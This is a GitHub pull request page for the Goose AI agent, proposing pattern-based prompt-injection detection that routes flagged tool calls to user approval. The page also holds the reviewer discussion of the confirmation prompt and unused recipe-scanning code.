Skip to content

Prompt injection detection (simplified - only pattern matching) #4237

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Open
wants to merge 8 commits into
base: main
Choose a base branch
from

Conversation

dorien-koelemeijer
Copy link

@dorien-koelemeijer dorien-koelemeijer commented Aug 21, 2025

Overview

This PR implements prompt injection detection using pattern-matching techniques, providing users with security warnings when potentially malicious tool calls are detected.

Working design doc with requirements

These notes are a result of pairing sessions with Douwe: https://docs.google.com/document/d/1OWh7Ab_eu8STaoplPA6AKF6AnXQNqXc8JYiAwmUYDTs/edit?tab=t.0

Implementation approach

Implemented pattern-based detection for prompt injection, scanning tool calls for potentially dangerous commands. Pattern-matching provides immediate protection while laying groundwork for future ML-based scanning with BERT models, which will be the next iteration of this work.

Security scanning was added in the reply_internal() method after permission checking, leveraging the existing tool approval workflow. The security scanner receives both proposed tool calls and full conversation history for contextual threat assessment (using BERT models and potentially other tools). In this iteration, the full conversation history is not considered, but we will do that once model scanning is integrated.

Security can be enabled/disabled via security.enabled config parameter with configurable confidence thresholds

Key changes

crates/goose/src/security/: New security module with scanner setup and patterns. Can be extended to support model-based scanning.
agent.rs: Added apply_security_results_to_permissions() to move security-flagged tools from approved to needs_approval
tool_execution.rs: Enhanced handle_approval_tool_requests_with_security() to include security warnings in confirmation prompts
ToolCallConfirmation.tsx: Added support for custom security warning prompts
GooseMessage.tsx: Updated to pass security context from backend to UI components

Configuration

security:
  enabled: true
  confidence_threshold: 0.5  

Future work

  • Scan context using BERT model(s) - do some more research on what model/models we want to use + if there's a workaround for the token limit that these models can ingest.
  • Integrate security scanning into ToolMonitor
  • Make sure we cover all different avenues for prompt injection (files and images, google drive links, recipes, MCP tool results, etc)

@dorien-koelemeijer dorien-koelemeijer changed the title Prompt injection (simplified - only pattern matching) Prompt injection detection (simplified - only pattern matching) Aug 21, 2025
@dorien-koelemeijer dorien-koelemeijer force-pushed the feat/prompt-injection-pattern-matching-v1 branch from 5d4f43d to 15fe965 Compare August 21, 2025 02:28
@dorien-koelemeijer dorien-koelemeijer marked this pull request as draft August 21, 2025 04:24
@dorien-koelemeijer dorien-koelemeijer marked this pull request as ready for review August 21, 2025 05:55
Copy link
Collaborator

@DOsinga DOsinga left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

sorry got to this late - already day for you so sending you what I have

// Format the confirmation prompt
let prompt = "Goose would like to call the above tool, do you allow?".to_string();

// Get confirmation from user
let permission_result = cliclack::select(prompt)
.item(Permission::AllowOnce, "Allow", "Allow the tool call once")
.item(Permission::AlwaysAllow, "Always Allow", "Always allow the tool call")
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

did you mean to delete this?

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We want to make sure users can't always allow a tool call. I wasn't entirely sure whether you had mentioned to take it away entirely, or if we just want to take away that option for these security findings. Let me know what you think the better way is.

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

I think we want to leave that in, as it is a common mode

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Will revert these changes, thanks for clarifying


permission_result
}

Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

As discussed before, we need to move this all out into its own infra rather than having the same logic for all the inspectors that decide whether to allow for a tool and then do the mixing

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Have tried my best to address this comment, let me know if I've fully misunderstood what you meant here 🫠


/// Scan recipe components for security threats
/// This should be called when loading/applying recipes
pub async fn scan_recipe_components(
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

are we using this?

Copy link
Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We're not, getting rid of this, probably copied that over from the previous branch.

}

// Scan recipe context (additional context data)
if let Some(context_items) = &recipe.context {
Copy link
Collaborator

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

this code is duplicated from above. also I don't think we use .context. we use other things though

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging this pull request may close these issues.

3 participants